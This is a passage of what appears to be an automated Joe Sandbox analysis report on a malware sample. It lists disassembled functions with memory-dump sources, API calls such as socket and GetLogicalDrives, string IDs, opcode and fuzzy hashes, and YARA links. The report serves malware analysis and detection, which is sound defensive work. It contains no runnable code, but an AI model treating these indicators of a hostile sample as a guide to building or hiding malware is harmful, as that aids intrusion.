                                    • Associated: 00000000.00000002.1606362172.0000000000DB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606489988.0000000000F75000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606506723.0000000000F76000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606522019.0000000000F77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606538018.0000000000F78000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_2d0000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID: Startup
                                    • String ID: if_nametoindex$iphlpapi.dll
                                    • API String ID: 724789610-3097795196
                                    • Opcode ID: 47ffce2886c3533351ae4c49d1a8fc54d73d8a6721e7c54a069befca7f6ee1ec
                                    • Instruction ID: b16e16562d6b8998df7c6293101dbc36553a0beaa2f55ad660fc773bdd71e364
                                    • Opcode Fuzzy Hash: 47ffce2886c3533351ae4c49d1a8fc54d73d8a6721e7c54a069befca7f6ee1ec
                                    • Instruction Fuzzy Hash: AF012BD0D903C206EB11BF39AD177B635A4AB15304FC41978D888822D2F7BCCA79C392
                                    Function 0039AA30 Relevance: 4.9, APIs: 3, Instructions: 377networkCOMMON
                                    Download Yara Rule
                                    APIs
                                    • socket.WS2_32(FFFFFFFF,?,00000000), ref: 0039AB9B
                                    • ioctlsocket.WS2_32(00000000,8004667E,00000001), ref: 0039ABE3
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1605482924.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                    • Associated: 00000000.00000002.1605461188.00000000002D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1605482924.00000000008B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1605482924.0000000000A16000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1605482924.0000000000A18000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1605995928.0000000000A1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000A1D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000CBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000CBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000D9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000DA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606362172.0000000000DB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606489988.0000000000F75000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606506723.0000000000F76000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606522019.0000000000F77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606538018.0000000000F78000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_2d0000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID: ioctlsocketsocket
                                    • String ID:
                                    • API String ID: 416004797-0
                                    • Opcode ID: b67a454e3ac4d7c988847c7cc69a63284c9243a4574d98487fad4f646d743ae5
                                    • Instruction ID: 59b66866182918fc7f79aad3e8b1a22d6e2450671ca7ed51197bea8a6ed8fea7
                                    • Opcode Fuzzy Hash: b67a454e3ac4d7c988847c7cc69a63284c9243a4574d98487fad4f646d743ae5
                                    • Instruction Fuzzy Hash: 40E1E070A047019BEB21CF24C884B6BB7E5EF89314F144B2CF9998B291E775DD44CB92
                                    Function 070A0970 Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 389COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1608192977.00000000070A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_70a0000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: A:\
                                    • API String ID: 0-3379428675
                                    • Opcode ID: eae54281b3fc9162cb49e9abb4997441d727cf813155db736f8aee8eab0a99f0
                                    • Instruction ID: fcf93f6e9cbe753dcf46ae156fbaafe431e0d68ecc47c2fcb58168ed48bcf1aa
                                    • Opcode Fuzzy Hash: eae54281b3fc9162cb49e9abb4997441d727cf813155db736f8aee8eab0a99f0
                                    • Instruction Fuzzy Hash: 9171F3EB16C219BD710285D12B54EFF6B6EE1E3734F30C62AF427D6A02F2940E4A5172
                                    Function 070A0983 Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 385COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1608192977.00000000070A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_70a0000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: A:\
                                    • API String ID: 0-3379428675
                                    • Opcode ID: 3be85b6bda06fbc0e1df78ccf1cd9b624b1ae9caf4aecb4a1806f3c3c7654e54
                                    • Instruction ID: ab138dffd949e0c52e99eec8d19c098b336592e6eafb13a602084eee05cd1988
                                    • Opcode Fuzzy Hash: 3be85b6bda06fbc0e1df78ccf1cd9b624b1ae9caf4aecb4a1806f3c3c7654e54
                                    • Instruction Fuzzy Hash: CD7105EB16C21DBDB10285D12B54AFF6B6EE5E7730F30863AF427D6602F2D40A4A5171
                                    Function 070A099D Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 377COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1608192977.00000000070A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_70a0000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: A:\
                                    • API String ID: 0-3379428675
                                    • Opcode ID: f829e3c3fb16cf0e4ddd1ce65bff66f3ebfcbc97eaeb03e4fc157dd7c51dce7b
                                    • Instruction ID: 4c8ec387b3f6be60b17e887497e5acf7736829495d5a570c87fa228f4c5de7c3
                                    • Opcode Fuzzy Hash: f829e3c3fb16cf0e4ddd1ce65bff66f3ebfcbc97eaeb03e4fc157dd7c51dce7b
                                    • Instruction Fuzzy Hash: EB7105EB16C219BD710285D12B54AFF6B6EE5E3730F30862AF427D6A02F2D40E495172
                                    Function 070A09E6 Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 353COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1608192977.00000000070A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_70a0000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: A:\
                                    • API String ID: 0-3379428675
                                    • Opcode ID: d78f2ccf61fcfeeb7cdfab9897cbcf346cf938d65b48ae375e5ebb6c53f138db
                                    • Instruction ID: 2e05da2fab05fa4d1c8febccc1ee1f9811c5b25eeea922133be5b89bce3ef7ca
                                    • Opcode Fuzzy Hash: d78f2ccf61fcfeeb7cdfab9897cbcf346cf938d65b48ae375e5ebb6c53f138db
                                    • Instruction Fuzzy Hash: F96105EB16C21DBDB14285D12B54AFF6B6EE5E7330F30862AF427D6A02F2D40E495172
                                    Function 070A09C1 Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 352COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1608192977.00000000070A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_70a0000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: A:\
                                    • API String ID: 0-3379428675
                                    • Opcode ID: 0b5642632c3aea376366b8ddea2ccf77424be97fdbe22fa1cf6b0ab1e76b3254
                                    • Instruction ID: 0d5a22a64670c4612e0b42d9e4fca5b2315627cea9f44600831f8274c6f59736
                                    • Opcode Fuzzy Hash: 0b5642632c3aea376366b8ddea2ccf77424be97fdbe22fa1cf6b0ab1e76b3254
                                    • Instruction Fuzzy Hash: 556105EB16C21DBDB10285D12B54AFF6B6EE5E7730F30863AF427D6A02F2D40A495172
                                    Function 070A09DA Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 348COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1608192977.00000000070A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_70a0000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: A:\
                                    • API String ID: 0-3379428675
                                    • Opcode ID: adee147c24cd93aca054c789bb2bd8e145d597049163bda7f5d5390c9fb456a4
                                    • Instruction ID: 7ceb2357899d96e96cc04b394bb1647bdc716da22f802bdf1c494bbf4497a297
                                    • Opcode Fuzzy Hash: adee147c24cd93aca054c789bb2bd8e145d597049163bda7f5d5390c9fb456a4
                                    • Instruction Fuzzy Hash: 616104EB16C219BDB10285D12B54AFF6B6EE5E3730F30862AF427D6A02F2D40A495172
                                    Function 070A0A00 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 346COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1608192977.00000000070A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_70a0000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: A:\
                                    • API String ID: 0-3379428675
                                    • Opcode ID: 8661cb0540d96919d5430d63153904c93db3a987e8f098e2dd4500c16294cb74
                                    • Instruction ID: e5c765933f1d955f3bddce468a3189fa7eda0f79224fd27d004232968d730155
                                    • Opcode Fuzzy Hash: 8661cb0540d96919d5430d63153904c93db3a987e8f098e2dd4500c16294cb74
                                    • Instruction Fuzzy Hash: 106128EB16C219BDB10285D12B54AFF6B6EE5E7334F30863AF427D6602F2D40E495172
                                    Function 070A0A16 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 338COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1608192977.00000000070A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_70a0000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: A:\
                                    • API String ID: 0-3379428675
                                    • Opcode ID: c586b42097aa89b8354618aa85b6e3786d5f8934a772bddf77642a13bb235233
                                    • Instruction ID: c4d2778e71a5cc0c502993626a86d193bfefd51b45c77483a187e75c3ac9f25f
                                    • Opcode Fuzzy Hash: c586b42097aa89b8354618aa85b6e3786d5f8934a772bddf77642a13bb235233
                                    • Instruction Fuzzy Hash: 9061F5EB16C219BDB10286D16B54AFF6B6EE5E7730F30862AF427D6602F2D40E495132
                                    Function 070A0A9B Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 331COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1608192977.00000000070A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_70a0000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: A:\
                                    • API String ID: 0-3379428675
                                    • Opcode ID: 2d6ca57760079dee7091eace24769c6328a65c63fca30fb87832df9b28fa434d
                                    • Instruction ID: 2cadac111aa5f9a47c2162f60a4bdd0cb271bbfc422b959edb3b1f2c05875d75
                                    • Opcode Fuzzy Hash: 2d6ca57760079dee7091eace24769c6328a65c63fca30fb87832df9b28fa434d
                                    • Instruction Fuzzy Hash: AD51D3EB16C229BDB10281D52B54AFF6B6EE5E7730F30862AF427D6A02F2D40A495171
                                    Function 070A0AC8 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 326COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1608192977.00000000070A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_70a0000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: A:\
                                    • API String ID: 0-3379428675
                                    • Opcode ID: f4fec3d8c4b96004a2e63ec276051a977725ba5feb10320e12ee6e71a8805295
                                    • Instruction ID: e985336500cdc48ef056402e9b6009c11858da1c6e230ff2c0558b253a27fbf2
                                    • Opcode Fuzzy Hash: f4fec3d8c4b96004a2e63ec276051a977725ba5feb10320e12ee6e71a8805295
                                    • Instruction Fuzzy Hash: DC61E7E726C219BDB20281D12B54AFF6B6EE5D7730F30866BF427D6602F2940E4E5131
                                    Function 070A0A32 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 320COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1608192977.00000000070A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_70a0000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: A:\
                                    • API String ID: 0-3379428675
                                    • Opcode ID: c399c5aeafa8686b565ce503241ddf85db0cfc7effc1fde6d91d8658e3023997
                                    • Instruction ID: 6f1d1b9eb34fee6d5997a47356bc720c2485396c5cc491e8a6d9a7d346f3bc70
                                    • Opcode Fuzzy Hash: c399c5aeafa8686b565ce503241ddf85db0cfc7effc1fde6d91d8658e3023997
                                    • Instruction Fuzzy Hash: F351E1EB16C229BD710285D12B54AFF6A6EE5E7730F30863AF427D6A02F2D40E495132
                                    Function 070A0A57 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 314COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1608192977.00000000070A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_70a0000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: A:\
                                    • API String ID: 0-3379428675
                                    • Opcode ID: daf739782cabba9e604661c8ee47e0d33decd910b1fad744d1d5776fcdd8929d
                                    • Instruction ID: 1cee347e6369426a9d667b2ebf0c838ac8f525c1260291aa95de0310d69ee318
                                    • Opcode Fuzzy Hash: daf739782cabba9e604661c8ee47e0d33decd910b1fad744d1d5776fcdd8929d
                                    • Instruction Fuzzy Hash: 9151D1EB16C229BD7102C5C52B54AFF6B7EE5E7734F30862AF427D6A02F2940A495131
                                    Function 070A0A8C Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 302COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1608192977.00000000070A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_70a0000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: A:\
                                    • API String ID: 0-3379428675
                                    • Opcode ID: b027f85cab366c932f0371f80911f0e25bb2d5695b65fe9686f51a6d3ac82e64
                                    • Instruction ID: dd7f059ab3fde312dc0bb2bf56e97348458fafdefda828efaf65e34cb1b38c47
                                    • Opcode Fuzzy Hash: b027f85cab366c932f0371f80911f0e25bb2d5695b65fe9686f51a6d3ac82e64
                                    • Instruction Fuzzy Hash: 0A51B1EB16C229BDB10285D12B54AFF6B7EE5D7734F30862AF427D5A02F2940E4D5131
                                    Function 070A0AB3 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 293COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1608192977.00000000070A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_70a0000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: A:\
                                    • API String ID: 0-3379428675
                                    • Opcode ID: 87451e09ce6ace9c99bce903740cca9bc6c66681474889351f5ccc833c614add
                                    • Instruction ID: 3da8dbcc1e9f6883c3a1a36ae4e9f8cd747933271238a1bd9de1f0ebb80d5ddb
                                    • Opcode Fuzzy Hash: 87451e09ce6ace9c99bce903740cca9bc6c66681474889351f5ccc833c614add
                                    • Instruction Fuzzy Hash: D951C0EB16C229BDB202C2D16B54AFF6B7EE5D7334F30862AF427D5A02F2940A4D5131
                                    Function 070A0AFB Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 281COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetLogicalDrives.KERNELBASE(?,?,?,0000DD49), ref: 070A0CB8
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1608192977.00000000070A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_70a0000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID: DrivesLogical
                                    • String ID: A:\
                                    • API String ID: 999431828-3379428675
                                    • Opcode ID: cfc727546288e2dfbfda240810a907ffb85d366875590de29b34bc2ceff251e1
                                    • Instruction ID: e060ce3160c4df6f40b38e9171e63be48ae63f7eb1af1249e9914df5f5ed6627
                                    • Opcode Fuzzy Hash: cfc727546288e2dfbfda240810a907ffb85d366875590de29b34bc2ceff251e1
                                    • Instruction Fuzzy Hash: D1518CEB16C229BD720282C16B54AFF6A6EE5D7734F30862AF427D5602F2D40E4D6031
                                    Function 070A0BB7 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 262COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1608192977.00000000070A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_70a0000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: A:\
                                    • API String ID: 0-3379428675
                                    • Opcode ID: eb317d7066312367d721ac8f2cff27fb602436d1b7e82436b1bfbad187736963
                                    • Instruction ID: 08fc69b8c076099bb0c2bed3fd6e8e8189bd92ed3bd32020ab84b9569febce09
                                    • Opcode Fuzzy Hash: eb317d7066312367d721ac8f2cff27fb602436d1b7e82436b1bfbad187736963
                                    • Instruction Fuzzy Hash: 2251C3EB56C228BD720281D16B54AFF6B6EE5D7730F30862AF417D6602F2950E4A5071
                                    Function 070A0B43 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 258COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetLogicalDrives.KERNELBASE(?,?,?,0000DD49), ref: 070A0CB8
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1608192977.00000000070A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_70a0000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID: DrivesLogical
                                    • String ID: A:\
                                    • API String ID: 999431828-3379428675
                                    • Opcode ID: fbde086362fceef5e3a1a9f084a48013977552e635589969a044403ebd96720b
                                    • Instruction ID: d568926d62eb949373782ab5b4268513a882045ac06f3fafb9e6dbd1d2fedeb1
                                    • Opcode Fuzzy Hash: fbde086362fceef5e3a1a9f084a48013977552e635589969a044403ebd96720b
                                    • Instruction Fuzzy Hash: E041BFEB56C229BD710282D16B54AFF6B6EE1D7334F30862AF427D1A02F2940F4E6031
                                    Function 070A0B92 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 258COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetLogicalDrives.KERNELBASE(?,?,?,0000DD49), ref: 070A0CB8
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1608192977.00000000070A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_70a0000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID: DrivesLogical
                                    • String ID: A:\
                                    • API String ID: 999431828-3379428675
                                    • Opcode ID: 4c628e57f65e4b41dc2272ae4d3fd9de2cc74a714f397b0a8eca7736bac8e5e1
                                    • Instruction ID: c6829ae1d97415b9bf2b8c5a1ea0459d2eb877a9035d49fb49ee2e290a7f080d
                                    • Opcode Fuzzy Hash: 4c628e57f65e4b41dc2272ae4d3fd9de2cc74a714f397b0a8eca7736bac8e5e1
                                    • Instruction Fuzzy Hash: D451D4EB16C219BDB24282D52B649FF6B6EE5D7334F30866AF417D5602F2850E4D5031
                                    Function 070A0B33 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 257COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetLogicalDrives.KERNELBASE(?,?,?,0000DD49), ref: 070A0CB8
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1608192977.00000000070A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_70a0000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID: DrivesLogical
                                    • String ID: A:\
                                    • API String ID: 999431828-3379428675
                                    • Opcode ID: cd83812538c01b7350d646cd83071b342d3300270918a8cf09141cc698536e54
                                    • Instruction ID: d5267878f7519c0702b384109c6081cf320db7dfaffcd54e4c97952f6bb5aba6
                                    • Opcode Fuzzy Hash: cd83812538c01b7350d646cd83071b342d3300270918a8cf09141cc698536e54
                                    • Instruction Fuzzy Hash: CF41A0EB16C229BD710286D56B54AFF6B6EE1D3734F308626F427D5602F2950F4D6031
                                    Function 070A0B63 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 254COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetLogicalDrives.KERNELBASE(?,?,?,0000DD49), ref: 070A0CB8
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1608192977.00000000070A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_70a0000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID: DrivesLogical
                                    • String ID: A:\
                                    • API String ID: 999431828-3379428675
                                    • Opcode ID: ab00d339b30766397bccf8b324ef8db9e0c142858662e89c0f2605018e3ec4f1
                                    • Instruction ID: af7070079603f54205beac0c9509aaff9ceda5c20e7e78c5a2e1530f17f4d11b
                                    • Opcode Fuzzy Hash: ab00d339b30766397bccf8b324ef8db9e0c142858662e89c0f2605018e3ec4f1
                                    • Instruction Fuzzy Hash: 3B51C1EB56C228BDB20282D52B54AFF6B6EE5D7730F30862BF817D6602F2950E495071
                                    Function 070A0B53 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 252COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetLogicalDrives.KERNELBASE(?,?,?,0000DD49), ref: 070A0CB8
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1608192977.00000000070A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_70a0000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID: DrivesLogical
                                    • String ID: A:\
                                    • API String ID: 999431828-3379428675
                                    • Opcode ID: 6a385ccb9853df3792ee733c09a2378b0a4a67f6937947157fe17f59d123abe1
                                    • Instruction ID: 13065eefae8e29e542828ec3f292c733827b094dc0fa833aa90993e8764e7186
                                    • Opcode Fuzzy Hash: 6a385ccb9853df3792ee733c09a2378b0a4a67f6937947157fe17f59d123abe1
                                    • Instruction Fuzzy Hash: 1441A2EB56C229BD714281D16B54AFF6B6EE5D3334F30862BF427D5602F2940E4D6031
                                    Function 070A0BD9 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 251COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetLogicalDrives.KERNELBASE(?,?,?,0000DD49), ref: 070A0CB8
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1608192977.00000000070A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_70a0000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID: DrivesLogical
                                    • String ID: A:\
                                    • API String ID: 999431828-3379428675
                                    • Opcode ID: 3dbe012ca51d963ab76529c504411e7779564eff15619b0a97e214df16def92d
                                    • Instruction ID: f2298e4ed4c1bd6a0ffb8a8de8af0d09efb4cbefe6016306ba9b308c6d7ce535
                                    • Opcode Fuzzy Hash: 3dbe012ca51d963ab76529c504411e7779564eff15619b0a97e214df16def92d
                                    • Instruction Fuzzy Hash: F641E3EB56C128BDB202C2D16B54AFE6B6EE5D7730F30862AF417D6602F2950E4E5031
                                    Function 002DF7B0 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 168networkCOMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1605482924.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                    • Associated: 00000000.00000002.1605461188.00000000002D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1605482924.00000000008B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1605482924.0000000000A16000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1605482924.0000000000A18000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1605995928.0000000000A1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000A1D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000CBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000CBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000D9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000DA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606362172.0000000000DB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606489988.0000000000F75000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606506723.0000000000F76000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606522019.0000000000F77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606538018.0000000000F78000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_2d0000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID: CloseEvent
                                    • String ID: multi.c
                                    • API String ID: 2624557715-214371023
                                    • Opcode ID: f877a9235c645b7bebf6b0176f68c6d1d94ff9942d05794b2c9ba83ac6a697a8
                                    • Instruction ID: 1f7b2631e68ad70b708ee0d7e3ea53d6f14c4f4d27f0931c2ac52669342032b5
                                    • Opcode Fuzzy Hash: f877a9235c645b7bebf6b0176f68c6d1d94ff9942d05794b2c9ba83ac6a697a8
                                    • Instruction Fuzzy Hash: 2F5107B1D243015BDB51AE30AD41BA732A4AF10318F08443AE98A9E353FB75ED29D793
                                    Function 002D78B0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1605482924.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                    • Associated: 00000000.00000002.1605461188.00000000002D0000.00000004.00000001.01000000.00000003.sdmpDownload File
